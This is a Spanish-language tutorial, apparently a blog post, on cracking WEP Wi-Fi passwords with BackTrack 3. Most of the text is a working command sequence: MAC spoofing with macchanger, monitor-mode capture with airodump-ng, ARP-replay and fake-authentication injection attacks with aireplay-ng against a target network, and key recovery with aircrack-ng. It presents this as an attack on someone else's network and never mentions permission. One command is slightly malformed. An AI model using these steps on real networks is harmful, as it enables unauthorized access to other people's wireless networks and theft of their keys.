Es cierto que hay tutoriales más avanzados para obtener contraseñas WEP, e incluso WPA, con versiones más modernas de BackTrack, como la versión 5, pero me quería estrenar en este sitio con algo que me conozco casi de memoria. Tranquilos, tengo pendiente jugar un poco con BackTrack 5 para sacar un nuevo tutorial más actualizado.
Pero bueno, a lo que vamos, cómo obtener contraseñas WEP usando la versión 3 de BackTrack. Lo primero y fundamental es tener BackTrack instalado en otra partición o en una máquina virtual. Después, simplemente hay que seguir los siguientes pasos:
1. Primero hay que comprobar si hay alguna red WEP cercana. Para ello, vamos a Inicio -> Internet -> Wireless Assistant".
2. Después abrimos la consola y tecleamos los siguientes comandos:
airmon-ng stop wifi0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0 -c (Canal)
airodump-ng wifi0
3. Miramos el BSSID y lo copiamos. A continuación, tecleamos lo siguiente:
airodump-ng -c (canal) -w mike --bssid (BSSID copiado) wifi0
4. Desde una nueva consola iniciamos un ataque de tipo 3 (Reinyección de peticiones ARP). Si hay algún cliente conectado a la red que atacamos, en -h usaremos la MAC del cliente en lugar de la nuestra falseada de la siguiente forma:
aireplay-ng -3 -b (BSSID que hemos copiado) -h 00:11:22:33:44:55 wifi0
5. Si no hay ningún cliente conectado a la red que atacamos, desde una nueva consola iniciamos un ataque de tipo 1 (autenticación falsa) para generar tráfico:
aireplay-ng -1 0 -a (BSSID que hemos copiado) -h 00:11:22:33:44:55 -e (ESSID) wifi0
6. Por último, esperamos a que el #Data en el airodump-ng vaya subiendo hasta llegar como mínimo a 30.000, y después desde una nueva consola probamos el primer comando (aircrack-ng n 64 mike-01.cap) y en unos minutos ya tendremos la clave.
Y esto ha sido todo, espero que os haya gustado el tutorial y esperemos volver a publicar algún tutorial por aquí pronto.